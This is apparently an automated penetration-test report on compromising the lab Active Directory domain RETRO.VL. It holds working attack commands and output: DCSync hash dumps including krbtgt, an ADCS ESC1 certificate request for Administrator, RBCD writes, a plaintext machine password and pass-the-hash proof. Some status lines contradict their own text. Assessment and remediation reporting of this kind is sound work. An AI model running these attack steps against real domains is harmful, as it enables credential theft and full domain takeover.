DOMAINATOR
Export //
← BACK TO THE REALM
// Active Directory Enumeration Report
Attack Overview
Full domain enumeration — RETRO.VL
3
Exploitable
10
Partial / Conditional
14
Secured
2
Not Tested
6
Users Found
6
Anon Shares
👑DOMAIN ADMINCOMPROMISEDClick for details
AD Environment
Domain Name:RETRO.VL
Domain Controller:DC
Forest Level:Windows Server 2016
Domain Functional Level:Windows Server 2016
Machine Account Quota:0
6
Users
2
Computers
17
Groups
1
Domain Admins
3
Privileged Accounts
(AdminCount=1)
3
ACL Risks
// Domain Risk Score
100%
0 — Hardened255075100 — Pwned
// Environment
DomainRETRO.VL
DC IP10.129.234.44
Auth ModeAUTHENTICATED
FootholdYES — credentials loaded
PE GatesDCSync Check, ADCS
Pwned Users6
Pwned Machines3
// User Analysis
RID-bruted Users6
Machine Accounts4
Anon SMB SharesADMIN$, C$, NETLOGON, Notes, SYSVOL, Trainees
Credential Artifacts32
Kerberos Tickets3
Certificates2
// PE Path: DCSync Check
ADCS (RetroClients)AdministratorDCSync confirmedFull domain compromise (8 hashes)
// PE Path: ADCS
Credential: banking$Machine context (banking$)ADCS ESC1 (RetroClients)Administrator certificateDomain hash extractionDomain Admin
// Privilege escalation paths
Attack Surface
Animated attack paths showing how each PE gate was reached
// Enumerated attack vectors
Attack Info
All 29 flows — status, phase, and outcome per vector
01
Zerologon
Anonymous (Pre-Step)
Not Vulnerable / Secured
The domain controller did not expose a usable Zerologon path.
02
Pre-Auth Spray
Anonymous (Pre-Step)
Not Tested
This flow was not executed in the current run.
03
AS-REP Roasting
Anonymous (Pre-Step)
Not Tested
AS-REP roasting did not expose roastable accounts.
04
SMB Shares
Anonymous (Pre-Step)
Partially / Conditionally Exploitable
6 anonymous share(s) exposed — Sensitive: NETLOGON, SYSVOL; Open: ADMIN$, C$, Notes, Trainees.
05
RID Brute
Anonymous (Pre-Step)
Partially / Conditionally Exploitable
Enumerated 6 user(s) and 4 machine account(s) via RID brute.
06
Password Policy
Anonymous (Pre-Step)
Partially / Conditionally Exploitable
Domain password policy was successfully enumerated.
07
LDAP Signing
Anonymous (Pre-Step)
Not Vulnerable / Secured
LDAP signing is enforced — relay attacks mitigated.
08
Kerberoast
Enumeration
Not Vulnerable / Secured
Kerberoast enumeration ran but found no roastable accounts.
09
ACL Abuse
Enumeration
Partially / Conditionally Exploitable
Writable ACLs were identified on domain objects — exploitation attempted.
10
Group Abuse
Enumeration
Not Vulnerable / Secured
No modifiable privileged group path was confirmed.
11
gMSA Read
Enumeration
Not Vulnerable / Secured
No gMSA objects or exposure were identified.
12
Machine Ownership
Enumeration
Not Vulnerable / Secured
No writable machine object or administrative path was available.
13
Local Admin Mapping
Enumeration
Partially / Conditionally Exploitable
Local admin paths identified — secretsdump attempted but not confirmed.
14
Delegation RBCD
Enumeration
Partially / Conditionally Exploitable
Potential RBCD candidates identified — exploitation conditions not met.
15
SYSVOL / GPP
Enumeration
Not Vulnerable / Secured
SYSVOL enumerated — no GPP credentials or sensitive files found.
16
LAPS Read
Enumeration
Not Vulnerable / Secured
LAPS is deployed but passwords are not readable by the current identity.
17
NoPac
Enumeration
Not Vulnerable / Secured
NoPac check completed — not vulnerable.
18
Unconstrained Delegation
Enumeration
Not Vulnerable / Secured
Unconstrained delegation enumeration completed.
19
Constrained Delegation
Enumeration
Exploitable
No constrained delegation (KCD) accounts found.
20
DCSync Check
Exploitation
Exploitable
DCSync replication rights confirmed — full domain credential extraction achieved.
21
ADCS
Exploitation
Exploitable
ADCS abuse succeeded and produced Domain Admin level authentication.
22
RBCD
Exploitation
Partially / Conditionally Exploitable
RBCD delegation write attempted — machine context not fully obtained.
23
S4U Impersonation
Exploitation
Not Vulnerable / Secured
S4U impersonation did not produce a usable privileged ticket.
24
Services Abuse
Exploitation
Partially / Conditionally Exploitable
Remote service abuse did not produce SYSTEM-level execution.
25
Scheduled Tasks
Exploitation
Partially / Conditionally Exploitable
Scheduled task was created — waiting for execution or confirmation failed.
26
GPO Abuse
Exploitation
Not Vulnerable / Secured
GPO abuse did not run in this context.
27
Shadow Credentials
Exploitation
Not Vulnerable / Secured
Shadow credential abuse did not produce a usable outcome.
28
NTLM Relay
Exploitation
Not Vulnerable / Secured
NTLM relay did not produce a usable outcome.
29
Ticket Reuse
Exploitation
Partially / Conditionally Exploitable
A reusable Kerberos ticket cache was identified.
// Staged execution flow
Attack Chain
Pre-step → Enumeration → Exploitation — step-by-step
Pre-Step — Initial Reconnaissance 5
Enumeration — Attack Surface Discovery 12
Exploitation — Privilege Escalation Attempts 10
// Network share exposure
SMB Shares
Per-identity share access — permissions and risk classification
NETWORK SHARE EXPOSURE 6 unique shares across 7 identities
👑 Administrator 6 shares
\\10.129.234.44\ADMIN$READ
\\10.129.234.44\C$READ
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
👤 trainee 4 shares
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
👤 jburley 6 shares
\\10.129.234.44\ADMIN$READ
\\10.129.234.44\C$READ
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
👤 tblack 4 shares
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
DC$ 4 shares
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
BANKING$ 4 shares
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
🔓 Anonymous 4 shares
\\10.129.234.44\NETLOGONREAD
\\10.129.234.44\NotesREAD
\\10.129.234.44\SYSVOLREAD
\\10.129.234.44\TraineesREAD
Admin shares Sensitive Standard
Anonymous Share Listing
Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Notes           Disk      
	SYSVOL          Disk      Logon server share 
	Trainees        Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
// Risk assessment
Conclusion & Risk
Risk distribution, attack path summary, and per-flow breakdown
Constrained Delegation — 100% (Exploitable)
DCSync Check — 100% (Exploitable)
ADCS — 100% (Exploitable)
RBCD — 80% (Partially / Conditionally Exploitable)
Delegation RBCD — 78% (Partially / Conditionally Exploitable)
Ticket Reuse — 75% (Partially / Conditionally Exploitable)
ACL Abuse — 72% (Partially / Conditionally Exploitable)
Services Abuse — 72% (Partially / Conditionally Exploitable)
Scheduled Tasks — 70% (Partially / Conditionally Exploitable)
Password Policy — 65% (Partially / Conditionally Exploitable)
Local Admin Mapping — 64% (Partially / Conditionally Exploitable)
SMB Shares — 63% (Partially / Conditionally Exploitable)
RID Brute — 60% (Partially / Conditionally Exploitable)
Initial Foothold Discovery
Password Policy
65%
Password Policy — Attack surface identified with partial exploitation potential — requires hardening.
Domain password policy was successfully enumerated.
SMB Shares
63%
SMB Shares — Attack surface identified with partial exploitation potential — requires hardening.
6 anonymous share(s) exposed — Sensitive: NETLOGON, SYSVOL; Open: ADMIN$, C$, Notes, Trainees.
RID Brute
60%
RID Brute — Attack surface identified with partial exploitation potential — requires hardening.
Enumerated users: administrator, guest, jburley, krbtgt, tblack, trainee
Credential Compromise
DCSync Check
100%
DCSync Check — Critical vulnerability confirmed and successfully exploited — immediate remediation required.
DCSync replication rights confirmed — full domain credential extraction achieved.
Post-Foothold Attack Surface
Constrained Delegation
100%
Constrained Delegation — Critical vulnerability confirmed and successfully exploited — immediate remediation required.
No constrained delegation (KCD) accounts found.
ADCS
100%
ADCS — Critical vulnerability confirmed and successfully exploited — immediate remediation required.
ADCS abuse succeeded and produced Domain Admin level authentication.
RBCD
80%
RBCD — Attack surface identified with partial exploitation potential — requires hardening.
RBCD delegation write attempted — machine context not fully obtained.
Delegation RBCD
78%
Delegation RBCD — Attack surface identified with partial exploitation potential — requires hardening.
Potential RBCD candidates identified — exploitation conditions not met.
Ticket Reuse
75%
Ticket Reuse — Attack surface identified with partial exploitation potential — requires hardening.
A reusable Kerberos ticket cache was identified.
ACL Abuse
72%
ACL Abuse — Attack surface identified with partial exploitation potential — requires hardening.
Writable ACLs were identified on domain objects — exploitation attempted.
Services Abuse
72%
Services Abuse — Attack surface identified with partial exploitation potential — requires hardening.
Remote service abuse did not produce SYSTEM-level execution.
Scheduled Tasks
70%
Scheduled Tasks — Attack surface identified with partial exploitation potential — requires hardening.
Scheduled task was created — waiting for execution or confirmation failed.
Local Admin Mapping
64%
Local Admin Mapping — Attack surface identified with partial exploitation potential — requires hardening.
Local admin paths identified — secretsdump attempted but not confirmed.
Not Vulnerable / Secured
Zerologon
3%
Zerologon — No exploitable path identified in the current assessment scope.
The domain controller did not expose a usable Zerologon path.
LDAP Signing
8%
LDAP Signing — No exploitable path identified in the current assessment scope.
LDAP signing is enforced — relay attacks mitigated.
Kerberoast
8%
Kerberoast — No exploitable path identified in the current assessment scope.
Kerberoast enumeration ran but found no roastable accounts.
Group Abuse
8%
Group Abuse — No exploitable path identified in the current assessment scope.
No modifiable privileged group path was confirmed.
gMSA Read
3%
gMSA Read — No exploitable path identified in the current assessment scope.
No gMSA objects or exposure were identified.
Machine Ownership
3%
Machine Ownership — No exploitable path identified in the current assessment scope.
No writable machine object or administrative path was available.
SYSVOL / GPP
8%
SYSVOL / GPP — No exploitable path identified in the current assessment scope.
SYSVOL enumerated — no GPP credentials or sensitive files found.
LAPS Read
8%
LAPS Read — No exploitable path identified in the current assessment scope.
LAPS is deployed but passwords are not readable by the current identity.
NoPac
8%
NoPac — No exploitable path identified in the current assessment scope.
NoPac check completed — not vulnerable.
Unconstrained Delegation
8%
Unconstrained Delegation — No exploitable path identified in the current assessment scope.
Unconstrained delegation enumeration completed.
S4U Impersonation
8%
S4U Impersonation — No exploitable path identified in the current assessment scope.
S4U impersonation did not produce a usable privileged ticket.
GPO Abuse
3%
GPO Abuse — No exploitable path identified in the current assessment scope.
GPO abuse did not run in this context.
Shadow Credentials
8%
Shadow Credentials — No exploitable path identified in the current assessment scope.
Shadow credential abuse did not produce a usable outcome.
NTLM Relay
8%
NTLM Relay — No exploitable path identified in the current assessment scope.
NTLM relay did not produce a usable outcome.
Not Tested
Pre-Auth Spray
N/A
Pre-Auth Spray — Not evaluated during this assessment cycle.
This flow was not executed in the current run.
AS-REP Roasting
N/A
AS-REP Roasting — Not evaluated during this assessment cycle.
AS-REP roasting did not expose roastable accounts.
// Classified security findings — OWASP / MITRE ATT&CK
Security Findings
Vulnerabilities ranked by severity: Critical → High → Medium → Low → Informational. Each finding maps to industry-standard frameworks.
CRITICAL3
#1 NTLM Hashes Exposed via DCSync CRITICAL
Affected Component Authentication Services
VULNERABILITY DESCRIPTION
Directory replication rights allowed full extraction of all domain account NTLM hashes. An attacker with these hashes can impersonate any domain account.
FINDING RISK
IMPACT
High
LIKELIHOOD
High
OVERALL RISK
Critical
RISKS
Immediate and complete compromise of domain integrity. All domain accounts, services, and systems are at risk. An attacker can maintain persistent, undetectable access.
RECOMMENDATIONS
  • Restrict DCSync rights, monitor replication events
EVIDENCE
impacket-secretsdump -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:123f689a8d551f42706ec952b1aeee9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e11fffd0ed83eedde12611fc2fbb8650:::
retro.vl\trainee:1104:aad3b435b51404eeaad3b435b51404ee:2a217a32bde94a23b26a8eea26c70874:::
retro.vl\jburley:1107:aad3b435b51404eeaad3b435b51404ee:25c3464d4e99d340122f3a360bbd7c6c:::
retro.vl\tblack:1109:aad3b435b51404eeaad3b435b51404ee:0adf9f3819565a0d0f3890290ecc3919:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:12c876af4deb1aedf56306edde6530b3:::
BANKING$:1106:aad3b435b51404eeaad3b435b51404ee:a0da35556323d8cc8bed2c4638cbaf28:::
#2 RBCD Delegation Abuse Path CRITICAL
Affected Component Active Directory
VULNERABILITY DESCRIPTION
Resource-Based Constrained Delegation write permissions exist that could allow an attacker to impersonate privileged accounts against target services.
FINDING RISK
IMPACT
High
LIKELIHOOD
High
OVERALL RISK
Critical
RISKS
Immediate and complete compromise of domain integrity. All domain accounts, services, and systems are at risk. An attacker can maintain persistent, undetectable access.
RECOMMENDATIONS
  • Restrict who can write msDS-AllowedToActOnBehalfOfOtherIdentity
EVIDENCE
bloodyAD set rbcd

banking
#3 ADCS ESC1 — Vulnerable Template (RetroClients) CRITICAL
Affected Component Active Directory Certificate Services
VULNERABILITY DESCRIPTION
A certificate template with dangerous enrollment settings allows any authenticated user to request certificates for arbitrary principals, enabling privilege escalation to Domain Admin.
FINDING RISK
IMPACT
High
LIKELIHOOD
High
OVERALL RISK
Critical
RISKS
Immediate and complete compromise of domain integrity. All domain accounts, services, and systems are at risk. An attacker can maintain persistent, undetectable access.
RECOMMENDATIONS
  • Review certificate template enrollment rights and EKU settings
EVIDENCE
certipy-ad req -template RetroClients -upn administrator

[*] Requesting certificate via RPC
[*] Request ID is 88
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
[*] Wrote certificate and private key to 'admin.pfx'
[*] Requesting certificate via RPC
[*] Request ID is 89
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'admin.pfx'
File 'admin.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): [*] Wrote certificate and private key to 'admin.pfx'
HIGH3
#4 Weak Password Policy HIGH
Affected Component Authentication Services
VULNERABILITY DESCRIPTION
The domain password policy does not meet security best practices. Minimum length, complexity requirements, or lockout thresholds are insufficient to prevent brute-force and spray attacks.
FINDING RISK
IMPACT
High
LIKELIHOOD
Medium
OVERALL RISK
High
RISKS
Significant security exposure that could lead to privilege escalation or lateral movement. Exploitation requires minimal additional access or conditions.
RECOMMENDATIONS
  • Enforce 14+ char minimum, enable complexity, set lockout to 5-10 attempts
EVIDENCE
SMB                      10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB                      10.129.234.44   445    DC               [+] retro.vl\Administrator:123f689a8d551f42706ec952b1aeee9a (Pwn3d!)
#5 Weak Credentials Discovered HIGH
Affected Component Authentication Services
VULNERABILITY DESCRIPTION
Domain account credentials were recovered through hash extraction. These credentials grant authenticated access to domain resources and can be used for lateral movement.
FINDING RISK
IMPACT
High
LIKELIHOOD
Medium
OVERALL RISK
High
RISKS
Significant security exposure that could lead to privilege escalation or lateral movement. Exploitation requires minimal additional access or conditions.
RECOMMENDATIONS
  • Enforce strong passwords, implement MFA, review password policy
EVIDENCE
impacket-secretsdump -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:123f689a8d551f42706ec952b1aeee9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e11fffd0ed83eedde12611fc2fbb8650:::
retro.vl\trainee:1104:aad3b435b51404eeaad3b435b51404ee:2a217a32bde94a23b26a8eea26c70874:::
retro.vl\jburley:1107:aad3b435b51404eeaad3b435b51404ee:25c3464d4e99d340122f3a360bbd7c6c:::
retro.vl\tblack:1109:aad3b435b51404eeaad3b435b51404ee:0adf9f3819565a0d0f3890290ecc3919:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:12c876af4deb1aedf56306edde6530b3:::
BANKING$:1106:aad3b435b51404eeaad3b435b51404ee:a0da35556323d8cc8bed2c4638cbaf28:::
#6 ACL Misconfigurations — Writable AD Objects HIGH
Affected Component Active Directory
VULNERABILITY DESCRIPTION
Active Directory objects have overly permissive access control lists. Write permissions on sensitive objects can be abused to escalate privileges or modify security-critical attributes.
FINDING RISK
IMPACT
High
LIKELIHOOD
Medium
OVERALL RISK
High
RISKS
Significant security exposure that could lead to privilege escalation or lateral movement. Exploitation requires minimal additional access or conditions.
RECOMMENDATIONS
  • Audit and remove unnecessary write permissions on AD objects
EVIDENCE
bloodyAD get writable


distinguishedName: CN=TPM Devices,DC=retro,DC=vl
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=retro,DC=vl
permission: WRITE

distinguishedName: CN=banking,CN=Computers,DC=retro,DC=vl
permission: CREATE_CHILD; WRITE
MEDIUM2
#7 Anonymous SMB Share Access MEDIUM
Affected Component Network Services
VULNERABILITY DESCRIPTION
SMB file shares are accessible without authentication. Sensitive shares (SYSVOL, NETLOGON) and custom shares may expose configuration files, scripts, or credentials.
FINDING RISK
IMPACT
Medium
LIKELIHOOD
Medium
OVERALL RISK
Medium
RISKS
Moderate security weakness that increases the overall attack surface. Exploitation may require additional conditions or chaining with other findings.
RECOMMENDATIONS
  • Disable anonymous access, tighten share and NTFS permissions
EVIDENCE
SMB                      10.129.234.44   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB                      10.129.234.44   445    DC               [+] retro.vl\Administrator:123f689a8d551f42706ec952b1aeee9a (Pwn3d!)
#8 Stale Passwords Detected MEDIUM
Affected Component Authentication Services
VULNERABILITY DESCRIPTION
This finding was identified during automated security assessment of the authentication services component.
FINDING RISK
IMPACT
Medium
LIKELIHOOD
Medium
OVERALL RISK
Medium
RISKS
Moderate security weakness that increases the overall attack surface. Exploitation may require additional conditions or chaining with other findings.
RECOMMENDATIONS
  • Enforce maximum password age policy (90–180 days)
  • Review and rotate stale credentials
LOW3
#9 WinRM Service Exposed LOW
Affected Component Network Services
VULNERABILITY DESCRIPTION
The Windows Remote Management service is accessible on the network. While expected on servers, unrestricted access increases lateral movement risk.
FINDING RISK
IMPACT
Low
LIKELIHOOD
Low
OVERALL RISK
Low
RISKS
Minor security observation with limited direct impact. May contribute to information gathering or be useful in combination with other findings.
RECOMMENDATIONS
  • Restrict WinRM access to admin networks, use HTTPS (5986)
#10 RDP Service Exposed LOW
Affected Component Network Services
VULNERABILITY DESCRIPTION
Remote Desktop Protocol is accessible on the network. Unrestricted RDP access increases the attack surface for brute-force and credential-based attacks.
FINDING RISK
IMPACT
Low
LIKELIHOOD
Low
OVERALL RISK
Low
RISKS
Minor security observation with limited direct impact. May contribute to information gathering or be useful in combination with other findings.
RECOMMENDATIONS
  • Restrict RDP access, enforce NLA, use VPN/jump hosts
#11 Inactive Domain Accounts LOW
Affected Component Authentication Services
VULNERABILITY DESCRIPTION
This finding was identified during automated security assessment of the authentication services component.
FINDING RISK
IMPACT
Low
LIKELIHOOD
Low
OVERALL RISK
Low
RISKS
Minor security observation with limited direct impact. May contribute to information gathering or be useful in combination with other findings.
RECOMMENDATIONS
  • Disable or remove inactive accounts
  • Implement automated account lifecycle management
FINDINGS
3
CRITICAL
3
HIGH
2
MEDIUM
3
LOW
#1NTLM Hashes Exposed via DCSy
#2RBCD Delegation Abuse Path
#3ADCS ESC1 — Vulnerable Templ
#4Weak Password Policy
#5Weak Credentials Discovered
#6ACL Misconfigurations — Writ
#7Anonymous SMB Share Access
#8Stale Passwords Detected
#9WinRM Service Exposed
#10RDP Service Exposed
#11Inactive Domain Accounts
// Remediation guidance
Mitigation Playbook
Per-flow remediation, hardening references, and MITRE mappings
Zerologon
Not Vulnerable / Secured
Patch and enforce Netlogon secure channel protections, monitor machine authentication anomalies.
Pre-Auth Spray
Not Tested
Enforce strong passwords, smart lockout, MFA, and remove predictable password patterns.
SMB Shares
Partially / Conditionally Exploitable
Remove anonymous access, tighten share and NTFS permissions, audit SYSVOL and NETLOGON.
RID Brute
Partially / Conditionally Exploitable
Restrict anonymous SAMR/RPC enumeration and monitor repeated SID probing.
Password Policy
Partially / Conditionally Exploitable
Enforce minimum 14-character passwords, smart lockout (5-10 attempts), fine-grained password policies, and MFA.
LDAP Signing
Not Vulnerable / Secured
Enforce LDAP signing and channel binding on all domain controllers to prevent relay attacks.
Kerberoast
Not Vulnerable / Secured
Use long random service account passwords, prefer gMSA, reduce unnecessary SPNs.
ACL Abuse
Partially / Conditionally Exploitable
Audit and remove unnecessary write, owner, and DACL rights on privileged objects.
Group Abuse
Not Vulnerable / Secured
Restrict who can modify privileged group membership and alert on changes.
Machine Ownership
Not Vulnerable / Secured
Review computer object ACLs, machine password reset rights, and local admin boundaries.
Local Admin Mapping
Partially / Conditionally Exploitable
Reduce local admin sprawl, use tiering, monitor remote admin access from lower-trust identities.
Delegation / RBCD
Partially / Conditionally Exploitable
Audit delegation settings, restrict who can write delegation-related attributes.
SYSVOL / GPP
Not Vulnerable / Secured
Remove GPP passwords from SYSVOL, audit Group Policy Preferences, apply MS14-025.
LAPS Read
Not Vulnerable / Secured
Restrict LAPS password read permissions to designated admin groups only.
NoPac
Not Vulnerable / Secured
Apply KB5008380 and KB5008602. Set ms-DS-MachineAccountQuota to 0.
Unconstrained Delegation
Not Vulnerable / Secured
Remove unconstrained delegation from all accounts except domain controllers. Use constrained delegation or RBCD instead.
Constrained Delegation
Exploitable
Audit constrained delegation settings and restrict protocol transition where not needed.
DCSync Check
Exploitable
Remove unnecessary DS-Replication-Get-Changes-All rights. Monitor for non-DC replication requests. Implement tiered administration.
ADCS
Exploitable
Review certificate templates for dangerous enrollment rights, SAN abuse, and privileged EKUs.
RBCD
Partially / Conditionally Exploitable
Remove machine/object write paths that enable resource-based constrained delegation.
S4U Impersonation
Not Vulnerable / Secured
Constrain delegation, minimize services trusted for delegation.
Services Abuse
Partially / Conditionally Exploitable
Lock down service control rights, review writable service binaries and paths.
Scheduled Tasks
Partially / Conditionally Exploitable
Restrict remote task creation, review writable task actions, monitor Task Scheduler logs.
GPO Abuse
Not Vulnerable / Secured
Restrict who can edit GPOs, review SYSVOL permissions, monitor GPO modifications.
Shadow Credentials
Not Vulnerable / Secured
Restrict write access to key credential material and monitor msDS-KeyCredentialLink changes.
Ticket Reuse
Partially / Conditionally Exploitable
Protect ticket material in memory and storage, rotate exposed sessions quickly.
// Recovered credentials
Spoils: Credentials
Passwords, hashes, tickets, certificates, and domain compromise artifacts
Credentials
Valid user account
Administrator - :123f689a8d551f42706ec952b1aeee9a
Valid user account
Guest - :31d6cfe0d16ae931b73c59d7e0c089c0
Valid user account
krbtgt - :e11fffd0ed83eedde12611fc2fbb8650
Valid user account
retro.vl\trainee - :2a217a32bde94a23b26a8eea26c70874
Valid user account
retro.vl\jburley - :25c3464d4e99d340122f3a360bbd7c6c
Valid user account
retro.vl\tblack - :0adf9f3819565a0d0f3890290ecc3919
Valid machine account
banking$ - DOMAINator1337!##&
Valid machine account
DC$ - :12c876af4deb1aedf56306edde6530b3
Valid machine account
BANKING$ - :a0da35556323d8cc8bed2c4638cbaf28
Discovered credential
Administrator:CERTIFICATE_AUTH (ADCS_ESC1)
Ticket
Kerberos cache
banking$.ccache
Kerberos cache
Administrator.ccache
Domain Compromise
Domain Admin
CONFIRMED — Full domain compromise achieved
Attack Path
PE Chain
DCSync (domain)
Enumeration
RID-bruted users
administrator, guest, jburley, krbtgt, tblack, trainee
RID-bruted machine accounts
banking$, dc$, banking$, banking$
Anonymous SMB shares
ADMIN$, C$, NETLOGON, Notes, SYSVOL, Trainees
Domain Hashes
Secretsdump — 8 account(s)
Administrator  →  aad3b435b51404eeaad3b435b51404ee:123f689a8d551f42706ec952b1aeee9a
Guest  →  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
krbtgt  →  aad3b435b51404eeaad3b435b51404ee:e11fffd0ed83eedde12611fc2fbb8650
trainee  →  aad3b435b51404eeaad3b435b51404ee:2a217a32bde94a23b26a8eea26c70874
jburley  →  aad3b435b51404eeaad3b435b51404ee:25c3464d4e99d340122f3a360bbd7c6c
tblack  →  aad3b435b51404eeaad3b435b51404ee:0adf9f3819565a0d0f3890290ecc3919
DC$  →  aad3b435b51404eeaad3b435b51404ee:12c876af4deb1aedf56306edde6530b3
BANKING$  →  aad3b435b51404eeaad3b435b51404ee:a0da35556323d8cc8bed2c4638cbaf28
Compromised Users
4 user account(s) with recovered credentials
Administrator  →  :123f689a8d551f42706ec952b1aeee9a
retro.vl\trainee  →  :2a217a32bde94a23b26a8eea26c70874
retro.vl\jburley  →  :25c3464d4e99d340122f3a360bbd7c6c
retro.vl\tblack  →  :0adf9f3819565a0d0f3890290ecc3919
Compromised Machines
3 machine account(s)
banking$  →  DOMAINator1337!##&
DC$  →  :12c876af4deb1aedf56306edde6530b3
BANKING$  →  :a0da35556323d8cc8bed2c4638cbaf28
Flow Finding
RID Brute — Partially / Conditionally Exploitable
Domain accounts discovered via adaptive enumeration chain.
Password Policy — Partially / Conditionally Exploitable
Domain password policy retrieved — review lockout threshold before spraying.
SMB                      10.129.234.44   445    DC               [+] Dumping password info for domain: RETRO
SMB                      10.129.234.44   445    DC               Minimum password length: 5
SMB                      10.129.234.44   445    DC               Password history length: 24
SMB                      10.129.234.44   445    DC               Maximum password age: 41 days 23 hours 53 minutes
SMB                      10.129.234.44   445    DC               Password Complexity Flags: 000000
SMB                      10.129.234.44   445    DC                  Domain Refuse Password Change: 0
SMB                      10.129.234.44   445    DC                  Domain Password Store Cleartext: 0
ACL Abuse — Partially / Conditionally Exploitable
Writable directory objects were identified but only limited attribute permissions are exposed.
Delegation RBCD — Partially / Conditionally Exploitable
Resource-based constrained delegation candidates were identified and can be evaluated by downstream RBCD and S4U exploitation flows.
RBCD candidates: Present
Constrained Delegation — Exploitable
STATUS: VULNERABLE
DCSync Check — Exploitable
STATUS: VULNERABLE
ADCS — Exploitable
STATUS: VULNERABLE
RBCD — Partially / Conditionally Exploitable
Delegation write succeeded but no machine password was obtained for ownership takeover.
ACL Abuse Surface
Writable AD objects discovered
distinguishedName: CN=TPM Devices,DC=retro,DC=vl
permission: CREATE_CHILD

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=retro,DC=vl
permission: WRITE

distinguishedName: CN=banking,CN=Computers,DC=retro,DC=vl
permission: CREATE_CHILD; WRITE
Delegation Targets
RBCD delegation candidates
banking
Certificate
Certificate file
admin.pfx
Certificate file
admin_orig.pfx
Domain Credential Extraction
Administrator:500:aad3b435b51404eeaad3b435b51404ee:123f689a8d551f42706ec952b1aeee9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e11fffd0ed83eedde12611fc2fbb8650:::
retro.vl\trainee:1104:aad3b435b51404eeaad3b435b51404ee:2a217a32bde94a23b26a8eea26c70874:::
retro.vl\jburley:1107:aad3b435b51404eeaad3b435b51404ee:25c3464d4e99d340122f3a360bbd7c6c:::
retro.vl\tblack:1109:aad3b435b51404eeaad3b435b51404ee:0adf9f3819565a0d0f3890290ecc3919:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:12c876af4deb1aedf56306edde6530b3:::
BANKING$:1106:aad3b435b51404eeaad3b435b51404ee:a0da35556323d8cc8bed2c4638cbaf28:::
// Spidered files
Spoils: Files
Sensitive files discovered across accessible SMB shares
15
FILES CAPTURED
6
SHARES ENUMERATED
CAPTURED FILES 15 files ◆ DOWNLOAD ALL
PATH IDENTITY SIZE TYPE ACTION
Notes/ToDo.txt
Notes
banking$ 0B TXT
Notes/user.txt
Notes
banking$ 0B TXT
Trainees/Important.txt
Trainees
banking$ 0B TXT
SYSVOL/retro.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
SYSVOL
banking$ 0B INI
SYSVOL/retro.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
SYSVOL
banking$ 0B INI
win.ini
ADMIN$
92B INI
LODgWhmQrx.txt
ADMIN$
0B TXT
ServerStandardEval.xml
ADMIN$
46KB XML
serverstandard.xml
ADMIN$
47KB XML
system.ini
ADMIN$
219B INI
user.txt
Notes
32B TXT
ToDo.txt
Notes
248B TXT
Important.txt
Trainees
288B TXT
desktop.ini
C$
282B INI
root.txt
C$
32B TXT
// Shell evidence
Spoils: Evidence
Command execution proof — whoami, ipconfig, and tool output per owned identity
Shell Evidence (12 sessions)
Admin Shell📄
retro\administrator
Administrator (Da Proof)👑 DA
═══════════════════════════════════════════════
  DOMAINATOR — Domain Admin Proof
  User: Administrator
  Target: 10.129.234.44
  Domain: retro.vl
═══════════════════════════════════════════════

whoami /all

USER INFORMATION
----------------

User Name           SID                                         
=================== ============================================
retro\administrator S-1-5-21-2983547755-698260136-4283918172-500

GROUP INFORMATION
-----------------

Group Name                                   Type             SID                                          Attributes                                                     
============================================ ================ ============================================ ===============================================================
Everyone                                     Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                       Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access   Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group             
